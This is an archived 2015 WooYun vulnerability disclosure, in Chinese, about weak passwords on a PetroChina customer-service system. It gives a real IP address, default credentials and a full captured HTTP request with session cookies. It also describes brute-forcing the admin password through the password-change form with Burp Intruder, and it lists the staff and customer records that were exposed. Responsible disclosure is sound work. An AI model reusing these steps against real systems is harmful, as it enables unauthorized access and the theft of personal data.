乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-14: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
弱口令啊
http://123.125.17.201:7070/cc/portal.jsp中石油客服中心系统弱口令 123 123进去后修改密码处 抓包
POST /cc/login.do?method=modifyPassword HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*Referer: http://123.125.17.201:7070/cc/login.do?method=modifyPasswordAccept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 123.125.17.201:7070Content-Length: 91Pragma: no-cacheCookie: motoAbcCmsLoginName=123; JSESSIONID=D8EDE036A5F7A82DB266755C5ADAB270; _user_info="rO0ABXNyACljb20uaG9sbHljcm0uc2VydmljZS5sb2dpbi5tb2RlbC5Vc2VySW5mb3s1p9qnFCc5AgAXWgAGaXNUZW1wTAAHYWdlbnRETnQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABmFyZWFJZHEAfgABTAAQY3VycmVudElwQWRkcmVzc3EAfgABTAAKZGJVc2VyTmFtZXEAfgABTAAGZGVwdElkcQB+AAFMAAplbXBsb3llZU5vcQB+AAFMAAdncm91cElkcQB+AAFMAAxpbnZhbGlkX2RhdGV0ABBMamF2YS91dGlsL0RhdGU7TAAJbG9naW5Sb2xlcQB+AAFMAAlsb2dpblRpbWVxAH4AAUwACG5pY2tOYW1lcQB+AAFMAApwYXJhbWV0ZXJzdAAPTGphdmEvdXRpbC9NYXA7TAAIcGFzc3dvcmRxAH4AAUwACHJlYWxOYW1lcQB+AAFMAAZzdGF0dXNxAH4AAUwACXN1YmplY3RJZHEAfgABTAAFdG9rZW5xAH4AAUwABnVzZXJJZHEAfgABTAAIdXNlck5hbWVxAH4AAUwACHVzZXJUeXBlcQB+AAFMAAp2YWxpZF9kYXRlcQB+AAJMAAt2aWV3TGV2ZWxOb3EAfgABeHAAdAAEMDAwMHQAAHQADzExOC4xOTMuMTUzLjE3MXB0AAxEMDAwMDAwMDAyMDdxAH4ABnEAfgAGcHB0ABMyMDE1LTEwLTE0IDEzOjA5OjIzdAADMTIzcHQABE1USXp0AAnoooHmsYnojaN0AAExdAAMRTAwMDAwMDAzMjUzdAAgZmY4MDgwODE0ZmRiZjllMjAxNTA2NGMwYjlkNDMwNWR0AAxVMDAwMDAwMDMwODh0AAnoooHmsYnojaN0AAhlbXBsb3llZXBxAH4ABg=="; _loginInfo="rO0ABXNyADNjb20uaG9sbHljcm0uc2VydmljZS5zeXN0ZW0uc2VjdXJpdHkubW9kZWwuTG9naW5Mb2eoEPdB+1HU3QIAB0wAAmlwdAASTGphdmEvbGFuZy9TdHJpbmc7TAAFbG9nSWRxAH4AAUwACWxvZ2luTmFtZXEAfgABTAAJbG9naW5UaW1lcQB+AAFMAApsb2dvdXRUaW1lcQB+AAFMAAZ1c2VySWRxAH4AAUwACHVzZXJOYW1lcQB+AAF4cHQADzExOC4xOTMuMTUzLjE3MXQAFDAwMDAwMDAwMDAwMDAwNTExNzkxdAADMTIzdAATMjAxNS0xMC0xNCAxMzowOToyM3B0AAxVMDAwMDAwMDMwODh0AAnoooHmsYnojaM="name=admin&oldPassword=§admin§&newPassword=admin&repeatPassword=admin&Submit=%E7%A1%AE%E8%AE%A4
name是用户名,可控,所以很有可能不要验证码就可以爆破出admin的密码burp抓包,发送到自动化模块,name改成admin oldPassword值设置为变量结果不错,原密码出来了,不过已经重置为admin了自行修改so 进系统看看,有了admin干啥都来劲
客户
一些分公司的信息
3500名员工
57000条工单
全国的所有的分公司包括所有负责人经理总经理的信息
客户信息管理好了,点到为止,未作任何恶意操作!!!
杜绝弱口令!
危害等级:中
漏洞Rank:8
确认时间:2015-10-14 15:55
非常感谢您的报告,问题已着手处理.
暂无